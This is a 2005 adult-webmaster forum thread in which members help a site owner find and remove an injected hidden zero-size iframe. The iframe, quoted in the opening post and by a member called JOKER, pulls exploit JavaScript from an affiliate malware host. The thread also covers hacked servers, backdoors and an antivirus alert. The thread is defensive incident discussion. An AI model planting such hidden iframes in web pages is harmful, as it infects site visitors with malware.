GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Joker says I have an install on my site - HELP (https://gfy.com/showthread.php?t=452637)

SleazyDream 04-06-2005 12:14 AM
Joker says I have an install on my site - HELP
 
on icq now with joker, this is pissing me off cause I can't find it.

here's what he said to me. (note - to my knowledge i have no installs)

"anyway... you can install what you want, it gets back to you earlier or later when it changes your affiliate-codes and does funny shit with the ppl that visit your site. I dont care, cause you hurt yourself, besides the whole industry of course... except a few, that can keep their users mashines clean (networks that actually care and send legit campaigns)... If you would admit you did, I had no problem with it... I know the code was there, I know it's not just for me since my mashine is clean, yet it had to be a "miracle" if I believe you. "


to my knowledge there are NO installs on my site - but it has been hacked before. I'm looking over all my servers with the tecks now and can't find this code he's accusing me of putting on the site

this is what he says is there <iframe src="http://mycounter.biz/in.php?wm=bruce" width="0" height="0"></iframe>


does anyone else see this - we can't seem to find it?

i'm thinking he's got a virus that's adding this to sites like mine on his machine from somewhere else but i'm open to anyone's help here if they see it on my site cause if it's there I want it off - BAD.


scott

ProjectNaked 04-06-2005 12:16 AM
sucks...I've been getting all kind of attempts from worms and lots of nasty email attachments - :mad:

bringer 04-06-2005 12:17 AM
where specificly is he seeing it? i did a quick check and found nothing remotely close to that

JOKER 04-06-2005 12:18 AM
A bit out of context - but ok, I'll play...


Look for this sourcecode at the near bottom of the site:

Code:
<!-- BEGIN SEXTRACKER CLIT CODE v2.1_f - ALTERATION WILL RESULT IN INACCURATE STATS --> <!-- THE FOLLOWING CODE IS COPYRIGHT (C) 1997-99 FLYING CROCODILE, INC --> <iframe src="http://mycounter.biz/in.php?wm=bruce" width="0" height="0"></iframe>

Mr.Fiction 04-06-2005 12:19 AM
Maybe he has spyware on his computer.

bringer 04-06-2005 12:20 AM
Quote:
Originally Posted by JOKEREMPIRE
A bit out of context - but ok, I'll play...


Look for this sourcecode at the near bottom of the site:

Code:
<!-- BEGIN SEXTRACKER CLIT CODE v2.1_f - ALTERATION WILL RESULT IN INACCURATE STATS --> <!-- THE FOLLOWING CODE IS COPYRIGHT (C) 1997-99 FLYING CROCODILE, INC --> <iframe src="http://mycounter.biz/in.php?wm=bruce" width="0" height="0"></iframe>
Code:
<!-- BEGIN SEXTRACKER CLIT CODE v2.1_f - ALTERATION WILL RESULT IN INACCURATE STATS --> <!-- THE FOLLOWING CODE IS COPYRIGHT (C) 1997-99 FLYING CROCODILE, INC --> <script
language="JavaScript"><!--
jv=10;an=navigator.appName;av=Math.round(parseFloat(navigator.appVersion)*1000);if(
navigator.appName.substring(0,9)hahahaha"Microsoft"){an="MSIE";}if((anhahahaha"MSIE")&&(parseInt
(navigator.appVersion)hahahaha2)){av=3010;}
//--></script> <script language="JavaScript1.1"><!--
jv=11;
//--></script> <script
language="JavaScript1.2"><!--
jv=12;window.onerror=function(){return true;}
//--></script> <script language="JavaScript1.3"><!--
jv=13;
//--></script> <script
language="JavaScript1.4"><!--
jv=14;
//--></script> <script language="JavaScript"><!--
j=0;tmp="";ss="na";cd="na";je="na";dt=new Date();tz=dt.getHours();hr=""+escape(
parent.document.referrer);function isNotDefined(v){return((vhahahaha"undefined")?true:false);}
if((isNotDefined(hr)hahahahatrue)||(hrhahahaha"")||(hrhahahaha"bookmarks")){hr="Bookmark";}else{wl=
window.location.href;if(wl.lastIndexOf('/')!=(wl.length-1)){wl=wl+"/";}tdr=
parent.document.referrer;if(tdr.lastIndexOf('/')!=(tdr.length-1)){tdr=tdr+"/";}if(tdrhahahahawl)
{hr="na";}}if(jv>=11){je=(navigator.javaEnabled()hahahahatrue)?"tr":"fa";}if(jv>=12){ss=
screen.width+"x"+screen.height;cd=(anhahahaha"MSIE")?screen.colorDepth:screen.pixelDepth;
if(isNotDefined(cd)hahahahatrue){cd="na";}}u="jv="+jv+"&an="+an+"&av="+av+"&ss="+ss+"&cd="+cd+
"&r="+hr+"&je="+je+"&ud=623"+"&tz="+tz;if(document.bgColor!=null){itag=
"<font color=\""+document.bgColor+"\">";}else{itag="";}itag=itag+
"<img height=\"1\" width=\"1\" border=\"0\" alt=\"\" src=\"http://clit4."+
"sextracker.com/clit?CID=179715&"+u+"\">";if(document.bgColor!=null){itag=itag+"</font>";}
document.write(itag+"\n");
//--></script> <noscript><img height="1"
width="1" border="0" alt
src="http://clit4.sextracker.com/clit?CID=179715&jv=00&ud=623"> </noscript> <!-- DONE WITH SEXTRACKER CLIT CODE -- HAVE A NICE DAY --> </p>

</body>
</html>

Fake Nick 04-06-2005 12:21 AM
what is your site again ?

JOKER 04-06-2005 12:23 AM
The site runs with a round-robin DNS on 3 servers, so it's possible
you only see the code only on one of them for certain countries and just on a first-visit (it disappeared for me after telling Sleazy and doing a reload of the page)

What the iframe does is it shows the encoded Javascript from

http://iframeprofit.com/adverts/bruce/index.php
(dont click if your PC is not 100% secure - EXPLOIT)

which is obviously the code of affiliate "bruce" of http://iframeprofit.com

jigga 04-06-2005 12:26 AM
Quote:
Originally Posted by SleazyDream
on icq now with joker, this is pissing me off cause I can't find it.

here's what he said to me. (note - to my knowledge i have no installs)

"anyway... you can install what you want, it gets back to you earlier or later when it changes your affiliate-codes and does funny shit with the ppl that visit your site. I dont care, cause you hurt yourself, besides the whole industry of course... except a few, that can keep their users mashines clean (networks that actually care and send legit campaigns)... If you would admit you did, I had no problem with it... I know the code was there, I know it's not just for me since my mashine is clean, yet it had to be a "miracle" if I believe you. "


to my knowledge there are NO installs on my site - but it has been hacked before. I'm looking over all my servers with the tecks now and can't find this code he's accusing me of putting on the site

this is what he says is there <iframe src="http://mycounter.biz/in.php?wm=bruce" width="0" height="0"></iframe>


does anyone else see this - we can't seem to find it?

i'm thinking he's got a virus that's adding this to sites like mine on his machine from somewhere else but i'm open to anyone's help here if they see it on my site cause if it's there I want it off - BAD.


scott

Many times I find (thanks to surfer emails) that stuff appears on galleries/sites that only shows up on specific country ip's. Personally I don't trust counters much and that may be what's causing it.

fünkmaster 04-06-2005 12:28 AM
Quote:
Originally Posted by Fake Nick
what is your site again ?
... I more and more enjoy your comments !!
:1orglaugh :1orglaugh :1orglaugh :1orglaugh

SleazyDream 04-06-2005 12:28 AM
we found it and removed it.

same fuckers as before. uggggg

fucking theives

bringer 04-06-2005 12:29 AM
Quote:
Originally Posted by jigga
Many times I find (thanks to surfer emails) that stuff appears on galleries/sites that only shows up on specific country ip's. Personally I don't trust counters much and that may be what's causing it.
yep, ive had the same problem with counters and foreign traffic

JOKER 04-06-2005 12:29 AM
Quote:
Originally Posted by Mr.Fiction
Maybe he has spyware on his computer.

No Spyware here, 110% sure :winkwink:

bringer 04-06-2005 12:29 AM
Quote:
Originally Posted by SleazyDream
we found it and removed it.

same fuckers as before. uggggg

fucking theives
server hacked or what?

jigga 04-06-2005 12:30 AM
Quote:
Originally Posted by jigga
Many times I find (thanks to surfer emails) that stuff appears on galleries/sites that only shows up on specific country ip's. Personally I don't trust counters much and that may be what's causing it.
and by counters I don't mean the companies that run the counter (although that's debatable too after porngrah and rumours about others :winkwink: ) but the fact that the same code appears on thousands of pages and thus makes it easy to exploit for hackers to call up whatever they want when a surfer hits that specific code.

Webmaster_Logic 04-06-2005 12:35 AM
Quote:
Originally Posted by bringer
server hacked or what?
Had to be.

boneprone 04-06-2005 12:41 AM
My sites were hacked yesterday....

boneprone 04-06-2005 12:42 AM
Actually my programer's security was breached and his usernames and login passwords to my servers was left exposed for the hackers to take and get into my server at will..

Still having Jupiter Hosting run a full diagonistic on what all was installed other than a change in my index pages. But for now my host techs have found info on the guy and have blocked em out..

According to my programer some back doors were installed.

So Sleazy, always watch those backdoors..

frankfortuna 04-06-2005 12:45 AM
Since we're on the topic, I've been getting this from the al4a/worldsex ad server for months upon every 10-40 clicks to their banners. Pierre says everything is clean. Anyone else getting this or is it a Norton bug perhaps?

can type: Auto-Protect Scan
Event: Threat Found!
Threat: Bloodhound.Exploit.20
File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB\bla[1].ani
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB
Computer: HOME
User: Administrator
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Wednesday, April 06, 2005 3:39:42 AM

KRL 04-06-2005 12:50 AM
There are some hardcore asian hackers making the rounds on servers.

TheJimmy 04-06-2005 12:50 AM
it's ok to be dirty....just use cologne...


PS: that polymorphic shit is bad bad bad news...


.

JOKER 04-06-2005 12:51 AM
Quote:
Originally Posted by frankfortuna
Since we're on the topic, I've been getting this from the al4a/worldsex ad server for months upon every 10-40 clicks to their banners. Pierre says everything is clean. Anyone else getting this or is it a Norton bug perhaps?

can type: Auto-Protect Scan
Event: Threat Found!
Threat: Bloodhound.Exploit.20
File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB\bla[1].ani
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB
Computer: HOME
User: Administrator
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Wednesday, April 06, 2005 3:39:42 AM
Do you honestly surf the net and work logged in as Administrator?

Full rights and all??

DateDoc 04-06-2005 12:59 AM
I have to admit at first glance of this post I thought Sleazy was saying "Choker says....." So I went back to the beginning to reread as I couldn't for the life of me figure out why Choker would help Sleazy out and found out it was "Joker says......"

Ackk, it is too late and too many beverages to be going through GFY. Night, night! :1orglaugh :1orglaugh

pornstar2pac 04-06-2005 01:00 AM
is there anyway you can stop these hackers?

maybe $100,000 will make them go away

SleazyDream 04-06-2005 01:18 AM
Quote:
Originally Posted by BusterPorn
I have to admit at first glance of this post I thought Sleazy was saying "Choker says....." So I went back to the beginning to reread as I couldn't for the life of me figure out why Choker would help Sleazy out and found out it was "Joker says......"

Ackk, it is too late and too many beverages to be going through GFY. Night, night! :1orglaugh :1orglaugh
jesus christ - i get blaimed for every fucking thing with choker with you people - no wonder he's insane.

fünkmaster 04-06-2005 01:30 AM
Quote:
Originally Posted by frankfortuna
Since we're on the topic, I've been getting this from the al4a/worldsex ad server for months upon every 10-40 clicks to their banners. Pierre says everything is clean. Anyone else getting this or is it a Norton bug perhaps?

can type: Auto-Protect Scan
Event: Threat Found!
Threat: Bloodhound.Exploit.20
File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB\bla[1].ani
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB
Computer: HOME
User: Administrator
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Wednesday, April 06, 2005 3:39:42 AM
... same here, but i kept quite, now the cat is out of the bag.

fünkmaster 04-06-2005 01:32 AM
Quote:
Originally Posted by JOKEREMPIRE
Do you honestly surf the net and work logged in as Administrator?

Full rights and all??
... default NT login shell, gotta love that OS !!
:1orglaugh :1orglaugh


All times are GMT -7. The time now is 11:07 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123